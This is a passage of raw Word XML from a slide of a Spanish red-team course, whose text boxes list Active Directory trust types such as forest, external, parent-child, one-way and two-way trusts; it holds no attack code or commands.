                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3D5090A9" id="Textbox 264" o:spid="_x0000_s1141" type="#_x0000_t202" style="position:absolute;margin-left:600.5pt;margin-top:21.3pt;width:107.9pt;height:24.25pt;z-index:-1567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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="37831099" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="607"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Bosque B</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41088" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="317DF51C" wp14:editId="4830EE24">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>679233</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2804160" cy="737870"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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737870"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0C8C5C5F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="56" w:line="339" w:lineRule="exact"/>
                              <w:ind w:left="1" w:right="2"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>1. Confíe en dos dominios en</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7FC05A1C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="336" w:lineRule="exact"/>
                              <w:ind w:left="2" w:right="1"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>diferentes bosques y bosques en general</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="114DEDD1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="339" w:lineRule="exact"/>
                              <w:ind w:left="1" w:right="1"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>no tienen confianza en el medio</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="317DF51C" id="Textbox 265" o:spid="_x0000_s1142" type="#_x0000_t202" style="position:absolute;margin-left:21.6pt;margin-top:53.5pt;width:220.8pt;height:58.1pt;z-index:-1567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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0C8C5C5F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="56" w:line="339" w:lineRule="exact"/>
                        <w:ind w:left="1" w:right="2"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>1. Confíe en dos dominios en</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7FC05A1C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="336" w:lineRule="exact"/>
                        <w:ind w:left="2" w:right="1"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>diferentes bosques y bosques en general</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="114DEDD1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="339" w:lineRule="exact"/>
                        <w:ind w:left="1" w:right="1"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>no tienen confianza en el medio</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41600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="182CB30C" wp14:editId="05DD9048">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5937503</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1282737</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1370330" cy="524510"/>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524510"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="77E2BA57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="284" w:right="281" w:firstLine="24"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Confianza externa bidireccional</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="182CB30C" id="Textbox 266" o:spid="_x0000_s1143" type="#_x0000_t202" style="position:absolute;margin-left:467.5pt;margin-top:101pt;width:107.9pt;height:41.3pt;z-index:-1567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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="77E2BA57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="284" w:right="281" w:firstLine="24"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Confianza externa bidireccional</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="457FB637" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7E46C1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6D2DBC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14397"/>
        </w:tabs>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:position w:val="31"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FF4C11F" wp14:editId="0BA18720">
                <wp:extent cx="2806065" cy="737870"/>
                <wp:effectExtent l="9525" t="0" r="3810" b="14604"/>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065" cy="737870"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1A44B1D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="539"/>
                              </w:tabs>
                              <w:spacing w:before="57" w:line="339" w:lineRule="exact"/>
                              <w:ind w:right="1"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-5"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>2.</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>Puede ser unidireccional</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="58678754" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="336" w:lineRule="exact"/>
                              <w:ind w:right="1"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-5"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>o</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="16BF95E2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="339" w:lineRule="exact"/>
                              <w:ind w:left="1" w:right="1"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Bidireccional</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1FF4C11F" id="Textbox 267" o:spid="_x0000_s1144" type="#_x0000_t202" style="width:220.95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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1A44B1D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="539"/>
                        </w:tabs>
                        <w:spacing w:before="57" w:line="339" w:lineRule="exact"/>
                        <w:ind w:right="1"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-5"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>2.</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>Puede ser unidireccional</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="58678754" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="336" w:lineRule="exact"/>
                        <w:ind w:right="1"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-5"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>o</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="16BF95E2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="339" w:lineRule="exact"/>
                        <w:ind w:left="1" w:right="1"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Bidireccional</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:position w:val="31"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC98754" wp14:editId="24597DE7">
                <wp:extent cx="1370330" cy="523240"/>
                <wp:effectExtent l="9525" t="0" r="1269" b="10159"/>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523240"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5D82039E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="787" w:hanging="408"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Confianza Padre-Hijo</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4EC98754" id="Textbox 268" o:spid="_x0000_s1145" type="#_x0000_t202" style="width:107.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5D82039E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="787" w:hanging="408"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Confianza Padre-Hijo</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0980540D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B252688" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B43DE88" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75BD1145" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714C8CA8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="217"/>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43136" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="183FDF56" wp14:editId="6567A69B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5338571</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>314720</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1370330" cy="524510"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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524510"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0893719E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="283" w:hanging="63"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Confianza externa unidireccional</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="183FDF56" id="Textbox 269" o:spid="_x0000_s1146" type="#_x0000_t202" style="position:absolute;margin-left:420.35pt;margin-top:24.8pt;width:107.9pt;height:41.3pt;z-index:-15673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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0893719E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="283" w:hanging="63"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Confianza externa unidireccional</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BD0E55" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDB8BC1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748D196B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="71"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64150173" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="8042"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Curso del Equipo Rojo de CyberWarFare</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5820E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId116"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43BB0E6E"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72928" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="546F6345" wp14:editId="50403B89">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1546860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>38099</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9098280" cy="6819900"/>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8280" cy="6819900"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9098280" cy="6819900"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="271" name="Image 271"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId117" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="9098280" cy="6819898"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="272" name="Graphic 272"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1501267" y="3082925"/>
                            <a:ext cx="5782310" cy="561340"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
